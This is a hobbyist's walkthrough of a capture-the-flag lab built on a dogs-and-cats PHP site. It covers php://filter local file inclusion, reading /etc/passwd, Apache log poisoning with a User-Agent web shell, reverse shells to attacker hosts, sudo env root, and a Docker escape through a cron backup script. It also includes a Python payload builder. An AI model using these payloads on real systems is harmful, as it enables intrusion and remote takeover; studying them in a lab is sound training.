As always, I'm a Dad with a full-time job and other tasks to do during the day. You'll likely notice IPs being different and consoles from different systems. This is because I get interrupted quite often and have to try and get this done here and there when I can.
I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.
We'll start out with the regular nmap scan. The scan shows an SSH port and an Apache website.
Oh, surprise! A website. I bet it's about dogs and cats. Yup. Look at that.
Looks like we have two buttons; each one shows us a picture that changes each time it's clicked. The URL changes the value of 'view' depending on which button is clicked (view=dog or view=cat). If we change the value to something other than those two options we see this:
It looks like it's going to try to include a PHP file named after the value, with .php appended. The warning also gives us the directory the include runs from, /var/www/html, as well as the include_path, .:/usr/local/lib/php.
There's no robots.txt file, but a gobuster run finds us some interesting files (flag.php among them).
I tried to go to flag.php and the page is blank. I tried viewing it manually with curl and importing it with the view variable. The closest I could come to something was adding the %00 bit to knock off the file extension. I can add it back in, but it doesn't actually include.
http://10.10.230.54/?view=index.php%00dog
One of the walkthroughs (yeah, I had to check this one out to move forward) suggested this page: https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/ . The basics (since that page will give you a certificate warning): to view the source code of any PHP file, wrap the include target in the php://filter stream wrapper with the convert.base64-encode filter:
php://filter/convert.base64-encode/resource=
which has been available since PHP 5.0.0. The file comes back base64-encoded instead of being executed, and we can decode it later. Here's how he uses it in his example:
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
We do this to our URL (the view value has to contain the word dog or cat somewhere):
http://10.10.230.54/?view=php://filter/convert.base64-encode/resource=dog
Decoding it gives us this:
echo PGltZyBzcmM9ImRvZ3MvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K | base64 --decode
<img src="dogs/<?php echo rand(1, 10); ?>.jpg" />
Ok, well, this is promising... now, how to bypass this dog/cat requirement. I won't lie... I had to look at a walkthrough for this... and I'm embarrassed because it's really quite easy. Here's what I had to change:
http://10.10.86.59/?view=php://filter/convert.base64-encode/cat/resource=flag
Either way, we get the base64 encoding of that flag.php file we found with gobuster:
Decoding it gives us the flag.
Ok... well, I had to check the walkthrough again... and AGAIN I overlooked something, but there was a touch of something I didn't know. One, we CAN change the URL to read the file system, which I had tried to do earlier to no avail. What I was missing was including the ext variable in the URL and setting it to nothing, so .php is no longer appended to the path.
http://10.10.4.78/?view=php://filter/convert.base64-encode/cat/resource=dog/../../../../../../etc/passwd&ext=
That gives a base64-encoded string. Decoding it gives the passwd file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Makes me wonder if I can get the shadow file too.... damn. Nope (www-data can't read /etc/shadow, so the include fails). Going back to the walkthrough, he pointed out that because we're now negating the extension we can simplify the URL injection like this:
http://10.10.4.78/?view=./dog/../../../../../../etc/passwd&ext=
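To tie the pieces so far together, here's an added example in Python (my own code, not the room's or the walkthrough author's): builders for the three payload shapes used above, plus a small model of the include logic as the error messages and the walkthrough describe it. The model is an assumption reconstructed from what we observed (the dog/cat substring check, .php appended unless ext is set, PHP's refusal of null bytes, lexical ../ handling) and not the room's real index.php; the file contents inside it are constructed, and the flag value is a placeholder.

```python
"""Added example (not the page's or the room's code): payload builders for the
php://filter LFI, plus a constructed model of the vulnerable include so the
payloads from the write-up can be exercised offline."""
import base64
import posixpath
from urllib.parse import urlencode

WEBROOT = "/var/www/html"   # directory the include warning revealed


def view_url(base, view, ext=None):
    """?view=...; the app appends .php unless ext is given, so ext="" disables it."""
    params = {"view": view} if ext is None else {"view": view, "ext": ext}
    return base.rstrip("/") + "/?" + urlencode(params)


def filter_payload(resource, keyword="cat"):
    """Base64-encode a file through php://filter. 'keyword' is a bogus filter
    name: PHP warns that it cannot create the filter but opens the resource
    anyway, and it satisfies the application's dog/cat substring check."""
    return f"php://filter/convert.base64-encode/{keyword}/resource={resource}"


def traversal_payload(target, keyword="dog", depth=6):
    """Plain traversal; needs ext="" so .php is not appended."""
    return f"./{keyword}/" + "../" * depth + target.lstrip("/")


def decode_filter_body(body):
    return base64.b64decode(body.strip()).decode()


class VulnerableInclude:
    """Model (assumption, not the real index.php) of the observed behaviour:
    require 'dog' or 'cat' in view, append ext (default .php), reject null
    bytes as PHP >= 5.3.4 does, and resolve ../ lexically. Raw includes return
    the file's source rather than executing it."""

    def __init__(self, files):
        self.files = files   # path -> contents: constructed in-memory filesystem

    def handle(self, view, ext=None):
        if "dog" not in view and "cat" not in view:
            return "Sorry, only dogs or cats are allowed."
        path = view + (".php" if ext is None else ext)
        if "\x00" in path:
            return "Warning: include(): Filename must not contain any null bytes"
        if path.startswith("php://filter/"):
            chain, _, resource = path[len("php://filter/"):].partition("resource=")
            data = self._read(resource)
            if data is not None and "convert.base64-encode" in chain.split("/"):
                return base64.b64encode(data.encode()).decode()
            return data if data is not None else self._missing(resource)
        data = self._read(path)
        return data if data is not None else self._missing(path)

    def _read(self, path):
        return self.files.get(posixpath.normpath(posixpath.join(WEBROOT, path)))

    @staticmethod
    def _missing(path):
        return f"Warning: include({path}): failed to open stream: No such file or directory"


# Constructed sample filesystem; the flag is a placeholder, not the room's.
SAMPLE_FILES = {
    f"{WEBROOT}/dog.php": '<img src="dogs/<?php echo rand(1, 10); ?>.jpg" />\r\n',
    f"{WEBROOT}/flag.php": '<?php $flag_1 = "THM{constructed_placeholder}"; ?>\n',
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
}


def demo():
    """Run the write-up's payloads against the model and return what each yields."""
    app = VulnerableInclude(SAMPLE_FILES)
    return {
        "null_byte": app.handle("index.php\x00dog"),
        "flag_source": decode_filter_body(app.handle(filter_payload("flag"))),
        "passwd_via_filter": decode_filter_body(
            app.handle(filter_payload("dog/../../../../../../etc/passwd"), ext="")),
        "passwd_plain": app.handle(traversal_payload("/etc/passwd"), ext=""),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"== {name}\n{result}")
```

PHP collapses the ../ segments itself before opening the file (the model does the same with posixpath.normpath), which is why a dog/ prefix that only exists to satisfy the substring check still lands on /etc/passwd.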
I had to read this guy's walkthrough about log poisoning (Dogcat - TryHackMe (ecrax.github.io)). Basically, we're going to include the Apache access log through the LFI. What he noticed is that the access log records the User-Agent of every request. If we put PHP in our User-Agent that runs a system command taken from a GET parameter, then including the log executes that PHP on the box and prints the command output inside the page.
So first, include the Apache log file:
http://10.10.4.78/?view=./dog../../../../../../var/log/apache2/access.log&ext=
Then we open the browser developer tools, find the GET request under 'Network', right-click it, choose 'Edit and Resend', and modify both the URL and the User-Agent. Here's what the URL and the agent should be:
http://10.10.4.78/?view=./dog../../../../../../var/log/apache2/access.log&ext=&n00b=whoami
<?php system($_GET['n00b']);?> <--User agent
Now when we search the page, we can see the command output. Very fancy.
OK, so the rest of this was a pain in the ass. I had to keep resending with various ls commands to find the flag file. Here's the second flag's location based on those ls's:
http://10.10.4.78/?view=./dog../../../../../../var/log/apache2/access.log&ext=&n00b=cat%20..%2Fflag2_QMW7JvaY2LvK.txt
OK. This is ridiculous. We need to get a shell on this. I tried issuing a wget command to fetch a PHP reverse shell I had hosted, and also tried to nc into my listener... nada. I got annoyed with Dev Tools and swapped over to Burp Suite, and with a URL-encoded PHP reverse shell I was able to get one.
The listener on my attack box:
nc -lvnp 1234
The PHP reverse shell (10.0.0.1 is a placeholder; use your attack box's IP and the listener's port):
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
The request sent in Burp Suite after URL encoding it ( https://meyerweb.com/eric/tools/dencoder/ ):
Once we're in the shell, I poked around a bit, but on quick glances I wasn't able to get far, and there's nothing in the home directories. I was able to see that we do have some sudo permissions:
$ sudo -l
Matching Defaults entries for www-data on ef0ea4376574:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on ef0ea4376574:
(root) NOPASSWD: /usr/bin/env
$ ls -la /usr/bin/env
-rwsr-sr-x 1 root root 43680 Feb 28 2019 /usr/bin/env
GTFOBins gives us something to use on that and lets us find the third flag:
$ sudo /usr/bin/env /bin/sh -p
pwd
/home
cd /root
ls -la
total 20
drwx------ 1 root root 4096 Mar 10 2020 .
drwxr-xr-x 1 root root 4096 Nov 18 20:17 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 35 Mar 10 2020 flag3.txt
cat flag3.txt
Searching the entire disk for anything named flag* turned up only the three flags I've already found...
I notice there's a .dockerenv file in the root directory, which tells me we're inside a Docker container. Searching around and reading a bit more in the other walkthroughs, we find some backup stuff in the /opt directory. The script references /root/container, which doesn't exist in the container's /root (see the listing above), so it must be run from outside the container, presumably by a scheduled job on the host. cat'ing the file we see this:
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
We start a new listener on a different port:
nc -lvnp 4444
So of course we append our one-liner reverse shell to it and wait:
echo "bash -i >& /dev/tcp/10.6.27.189/4444 0>&1" >> backup.sh
Within a minute we have our reverse shell, this time on the host itself (note the hostname dogcat rather than the container ID), and our last flag:
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.27.189] from (UNKNOWN) [10.10.109.254] 39640
bash: cannot set terminal process group (5778): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls -la
ls -la
total 40
drwx------ 6 root root 4096 Apr 8 2020 .
drwxr-xr-x 24 root root 4096 Apr 8 2020 ..
lrwxrwxrwx 1 root root 9 Mar 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Apr 8 2020 .cache
drwxr-xr-x 5 root root 4096 Mar 10 2020 container
-rw-r--r-- 1 root root 80 Mar 10 2020 flag4.txt
drwx------ 3 root root 4096 Apr 8 2020 .gnupg
drwxr-xr-x 3 root root 4096 Apr 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Mar 10 2020 .selected_editor
root@dogcat:~# cat flag4.txt